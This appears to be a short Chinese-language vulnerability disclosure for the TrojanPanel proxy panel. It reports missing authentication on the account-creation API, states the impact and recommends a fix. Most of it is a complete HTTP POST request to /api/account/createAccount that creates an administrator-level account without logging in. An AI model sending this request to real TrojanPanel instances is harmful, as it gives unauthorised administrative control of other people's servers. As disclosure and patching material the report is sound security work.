TrojanPanel-未授权添加用户

闲来无事 发现了 一个授权漏洞

漏洞描述：攻击者可以未授权添加后台管理员用户

如下图所示，通过burp发送请求即可添加管理员用户

POST /api/account/createAccount HTTP/1.1
Host: xx.xx.xx.xx:xxx
Content-Length: 165
Sec-Ch-Ua: "Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111"
Accept: application/json, text/plain, */*
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"quota":-1,"download":0,"upload":0,"username":"test02","pass":"qwe511402","roleId":2,"deleted":0,"expireTime":1964411864000,"createTime":"2023-04-09T05:57:44.830Z"}

发送后，即可成功用户test02 登录到后台，如下图

漏洞危害：利用该接口，攻击者可成功添加用户至后台、

修复建议：添加鉴权，只允许系统管理员添加用户